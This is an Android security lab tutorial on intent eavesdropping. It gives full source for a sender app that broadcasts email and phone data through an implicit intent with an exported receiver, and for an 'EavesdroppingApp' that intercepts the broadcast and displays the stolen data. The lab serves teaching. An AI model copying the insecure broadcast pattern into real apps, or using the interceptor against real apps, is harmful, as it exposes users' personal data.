Hands-on Lab

Hands-on Lab Practice

This lab illustrates the concept of intent eavesdropping where the comp1 activity in App1 intends to send a broadcast intent with data to a broadcastReceiver in the App1 but instead, it goes to a malicious external app App2 which intercepts the sensitive message coming with the intent. This is an intra-app IPC with intent eavesdropping which can be prevented with secure programming.

InterAppSender

//Copy and paste the following code into “MainActivity.java”.

//MainActivity.java

package example.com.interappsender;

import androidx.appcompat.app.AppCompatActivity;

import android.content.Intent;

import android.os.Bundle;

import android.view.View;

import android.widget.EditText;

public class MainActivity extends AppCompatActivity {

private EditText email, phone;

@Override

protected void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

setContentView(R.layout.activity_main);

email = findViewById(R.id.email);

phone = findViewById(R.id.phone);

}

public void onClick(View view) {

//Intent intent = new Intent(this,MyReceiver.class);

Intent intent = new Intent("com.example.MyBroadcast");

intent.putExtra("Email",email.getText().toString());

intent.putExtra("Phone",phone.getText().toString());

sendBroadcast(intent);

}

}

//Copy the following code into “activity_main.xml”. Make sure to click on the “Text” tab at the bottom left of the “activity_main.xml” window

//activity_main.xml

<?xml version="1.0" encoding="utf-8"?>

<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"

xmlns:app="http://schemas.android.com/apk/res-auto"

xmlns:tools="http://schemas.android.com/tools"

android:layout_width="match_parent"

android:layout_height="match_parent"

tools:context="example.com.interappsender.MainActivity">

<TextView

android:id="@+id/email_text"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_alignParentTop="true"

android:layout_centerHorizontal="true"

android:layout_marginTop="95dp"

android:text="@string/e_mail"

android:textSize="20sp"/>

<EditText

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:id="@+id/email"

android:layout_below="@+id/email_text"

android:layout_centerHorizontal="true"

android:ems="10"

android:background="#BED2CE"

android:layout_marginTop="5dp"

android:gravity="center"

android:autofillHints="Email" />

<TextView

android:id="@+id/phone_num"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_alignEnd="@+id/email_text"

android:layout_below="@+id/email"

android:layout_marginTop="19dp"

android:text="@string/phone"

android:textSize="20sp"/>

<EditText

android:id="@+id/phone"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_below="@+id/phone_num"

android:layout_centerHorizontal="true"

android:layout_marginTop="5dp"

android:ems="10"

android:inputType="phone"

android:background="#BED2CE"

android:gravity="center"/>

<Button

android:id="@+id/send"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_below="@+id/phone"

android:layout_centerHorizontal="true"

android:layout_marginTop="36dp"

android:onClick="onClick"

android:text="@string/send"

tools:ignore="UsingOnClickInXml" />

</RelativeLayout>

//Copy the following code into the newly created “ShowInfoofIntent.java”.

//ShowInfoofIntent.java

package example.com.interappsender;

import android.app.Activity;

import android.os.Bundle;

import android.widget.TextView;

public class ShowInfoofIntent extends Activity {

private TextView phone,email;

@Override

protected void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

setContentView(R.layout.showinfoofintent);

phone = findViewById(R.id.Phone);

email = findViewById(R.id.Email);

Bundle data = getIntent().getExtras();

String Email = data.getString("Email");

String Phone = data.getString("Phone");

email.setText(Email);

phone.setText(Phone);

}

}

//Copy the following code into the newly created “MyReceiver.java”.

// MyReceiver.java

package example.com.interappsender;

import android.content.BroadcastReceiver;

import android.content.Context;

import android.content.Intent;

import android.os.Bundle;

public class MyReceiver extends BroadcastReceiver {

@Override

public void onReceive(Context context, Intent intent) {

// TODO Auto-generated method stub

Bundle bundle = intent.getExtras();

String name = bundle.getString("Email");

String password = bundle.getString("Phone");

Intent show = new Intent();

show.putExtra("Email",name);

show.putExtra("Phone",password);

show.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

show.setClassName("example.com.interappsender", "example.com.interappsender.ShowInfoofIntent");

context.startActivity(show);

}

/* Bundle extras = intent.getExtras();

//final String tag = "Intent Intercepter";

if (extras != null) {

if (extras.containsKey("number")) {

Object num = extras.get("number");

if (num.toString().equals("0")) {

Intent i = new Intent();

i.setClassName("example.com.broadcastreceiver", "example.com.broadcastreceiver.SecondActivity");

i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

context.startActivity(i);

}

else if (num.toString().equals("1")) {

//Toast.makeText(context, "This is an intent spoofing example!", Toast.LENGTH_LONG).show();//This is the message which will display on the screen of intent sender

Intent i = new Intent();

i.setClassName("example.com.broadcastreceiver", "example.com.broadcastreceiver.ThirdActivity");

i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

context.startActivity(i);

}

}

}

}*/

}

Copy the following code into “showinfoofintent.xml” file.

showinfoofintent.xml

<?xml version="1.0" encoding="utf-8"?>

<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"

xmlns:tools="http://schemas.android.com/tools"

android:layout_width="match_parent"

android:layout_height="match_parent"

tools:context="example.com.interappsender.ShowInfoofIntent">

<TextView

android:id="@+id/email"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_alignParentStart="true"

android:layout_alignParentTop="true"

android:layout_marginStart="100dp"

android:layout_marginTop="80dp"

android:text="@string/email"

android:background="#BED2CE"

android:textSize="20sp"/>

<TextView

android:id="@+id/phone"

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:layout_alignStart="@+id/email"

android:layout_below="@+id/email"

android:layout_marginTop="30dp"

android:text="@string/phone"

android:background="#BED2CE"

android:textSize="20sp"/>

<TextView

android:id="@+id/Email"

android:layout_width="100dp"

android:layout_height="wrap_content"

android:layout_alignBottom="@+id/email"

android:layout_marginStart="38dp"

android:layout_toEndOf="@+id/email"

android:background="#669999"

android:gravity="center"

android:textSize="20sp"/>

<TextView

android:id="@+id/Phone"

android:layout_width="100dp"

android:layout_height="wrap_content"

android:layout_alignBaseline="@+id/phone"

android:layout_alignBottom="@+id/phone"

android:layout_alignStart="@+id/Email"

android:background="#669999"

android:gravity="center"

android:textSize="20sp"/>

</RelativeLayout>

//Copy the following code into “AndroidManifest.xml”.

//AndroidManifest.xml

<?xml version="1.0" encoding="utf-8"?>

<manifest xmlns:android="http://schemas.android.com/apk/res/android"

package="example.com.interappsender">

<application

android:allowBackup="true"

android:icon="@mipmap/ic_launcher"

android:label="@string/app_name"

android:roundIcon="@mipmap/ic_launcher_round"

android:supportsRtl="true"

android:theme="@style/Theme.InterAppSender">

<activity

android:name=".MainActivity"

android:exported="true">

<intent-filter>

<action android:name="android.intent.action.MAIN" />

<category android:name="android.intent.category.LAUNCHER" />

</intent-filter>

</activity>

<activity android:name=".ShowInfoofIntent" >

</activity>

<receiver android:name=".MyReceiver"

android:exported="true">

<intent-filter>

<action android:name="com.example.MyBroadcast"/>

<category android:name="android.intent.category.DEFAULT" />

</intent-filter>

</receiver>

</application>

</manifest>

OutPut Interfaces

EavesdroppingApp

//Copy and paste the following code into “MainActivity.java”.

//MainActivity.java

package example.com.eavesdroppingapp;

import androidx.appcompat.app.AppCompatActivity;

import android.os.Bundle;

public class MainActivity extends AppCompatActivity {

@Override

protected void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

setContentView(R.layout.activity_main);

}

}

//Copy the following code into the newly created “MyReceiver.java”.

//MyReceiver.java

package example.com.eavesdroppingapp;

import android.content.BroadcastReceiver;

import android.content.Context;

import android.content.Intent;

import android.os.Bundle;

import android.os.CountDownTimer;

import android.widget.Toast;

public class MyReceiver extends BroadcastReceiver {

@Override

public void onReceive(Context context, Intent intent) {

Bundle bundle = intent.getExtras();

String Email = bundle.getString("Email");

String Phone = bundle.getString("Phone");

final Toast tag = Toast.makeText(context, "Eavesdropping from Receiver app (insecured version)\nE-mail "+Email+"\n"+"Phone"+Phone+"\n" ,Toast.LENGTH_SHORT);

tag.show();

new CountDownTimer(10000, 1000)

{

public void onTick(long millisUntilFinished) {tag.show();}

public void onFinish() {tag.show();}

}.start();

}

}

//Copy the following code into “AndroidManifest.xml”. Make sure to click on the “Text” tab at the bottom left of the “AndroidManifest.xml” window

//AndroidManifest.xml

<?xml version="1.0" encoding="utf-8"?>

<manifest xmlns:android="http://schemas.android.com/apk/res/android"

package="example.com.eavesdroppingapp">

<application

android:allowBackup="true"

android:icon="@mipmap/ic_launcher"

android:label="@string/app_name"

android:roundIcon="@mipmap/ic_launcher_round"

android:supportsRtl="true"

android:theme="@style/Theme.EavesdroppingApp">

<activity

android:name=".MainActivity"

android:exported="true">

<intent-filter>

<action android:name="android.intent.action.MAIN" />

<category android:name="android.intent.category.LAUNCHER" />

</intent-filter>

</activity>

<receiver android:name=".MyReceiver"

android:exported="true">

<intent-filter>

<action android:name="com.example.MyBroadcast"/>

</intent-filter>

</receiver>

</application>

</manifest>

//Copy the following code into “activity_main.xml”. Make sure to click on the “Text” tab at the bottom left of the “activity_main.xml” window

//activity_main.xml

<?xml version="1.0" encoding="utf-8"?>

<androidx.constraintlayout.widget.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android"

xmlns:app="http://schemas.android.com/apk/res-auto"

xmlns:tools="http://schemas.android.com/tools"

android:layout_width="match_parent"

android:layout_height="match_parent"

tools:context="example.com.eavesdroppingapp.MainActivity">

<TextView

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:text="This is an eavesdropping app"

app:layout_constraintBottom_toBottomOf="parent"

app:layout_constraintLeft_toLeftOf="parent"

app:layout_constraintRight_toRightOf="parent"

app:layout_constraintTop_toTopOf="parent" />

</androidx.constraintlayout.widget.ConstraintLayout>

DOWNLOAD LINK FOR ENCRYPT FILE

InterAppSender

EavesdroppingApp